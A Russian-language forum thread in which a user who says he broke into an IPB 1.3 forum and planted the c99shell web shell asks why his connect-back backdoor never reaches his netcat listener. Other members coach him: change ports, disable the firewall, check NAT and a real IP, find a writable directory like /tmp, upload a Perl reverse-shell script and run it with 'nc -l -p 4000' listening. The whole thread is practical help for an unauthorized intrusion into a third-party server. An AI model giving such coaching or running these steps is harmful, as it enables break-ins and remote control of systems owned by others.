Всем привет! Проблема следующая: сломал, я значит форум ipb 1.3 final, залил шелл и хотел замутить connback-backdoor (я использовал c99shell). Но запустив nc на локальной машине, я так и не дождался коннекта. Пробовал другие веб-шеллы и серваки, то же самое. Не коннектится, блин... Может у меня не хватает прав или чего еще? Спасибо!
Попробуй поменять порт коннбэка. Например на 4000 и обязательно отключи персональный файерволл, если он у тебя есть. Ведь от бэкдора для твоего компа будет входящее соединение, а фаер на неизвестные порты их блокирует. Плюс если у тебя сокс, то с99 неправильно определит твой ip. А бэкконнект возможен только на реальный ip. Если у тебя ВПН, опять таки коннект возможен только на твой "родной" ip. Свой ip я,например, определяю прогой Angry ip scanner.
Порт менял. Это точно не сокс и не vpn. Фаер мой молчит. Что еще может быть? Может прав мало? Хотя они не nobody...
Хм, извиняй конечно, но не через нат-ли ты сидишь? У тебя белый ИП? Если белый, то скорее всего просто прав не хватает...хотя...подними у себя апач, настрой права, и протесть на себе
Ната нет, а что такое белый ip? У себя нормально работает. Я вот что еще попробовал. Закачал сишный конбэк, хотел скомпилить, но в ответ шелл ничего не выдал. Может я не могу вообще запускать никакие бинарники? Вообще, парни, я запутался, если честно...((
К тебе вообще извне могут приконнектиться??? Под nobody врядли у тебя сищный бек скомпилится... Ты точно УВЕРЕН что ты не за НАТом сидишь?
1. Да я точно уверен, что я сижу не за NAT'ом и что мой ip не 192.168.*.* )) 2. Пробовал несколько шеллов, в том числе и r57shell. То же самое (( 3. Конбэк на перле тоже пробовал. 4. Фаер отрублен. P.S. C99Shell пишет "Can't download sources!"
Хе хе. У тебя нет даже прав на запись=( Ищи папку с правами на запись, начнем с этого. Попробуй зайти в /tmp и залить туда конбэк на перле сторонний. О результатах отпишись.
Хм...скажи свой ип в ПМ и порт слушай в nc - проверим в чем дело - в прове твоем или в хостах(ну или самом коннбеке) ))
Хм...странно, но ведь в папку со смайликами есть доступ у всех? Или я ошибаюсь? З.Ы. Хорошо было бы исходник конбэка на перле, если не трудно
Перловый конбэк Выручал меня бессчетное кол-во раз. Юзать: Perl sw.pl 127.0.0.1 4000 Вместо 127.0.0.1 ставь СВОЙ ip адрес. Соответственно на твоем компе должен висеть netcat: nc -l -p 4000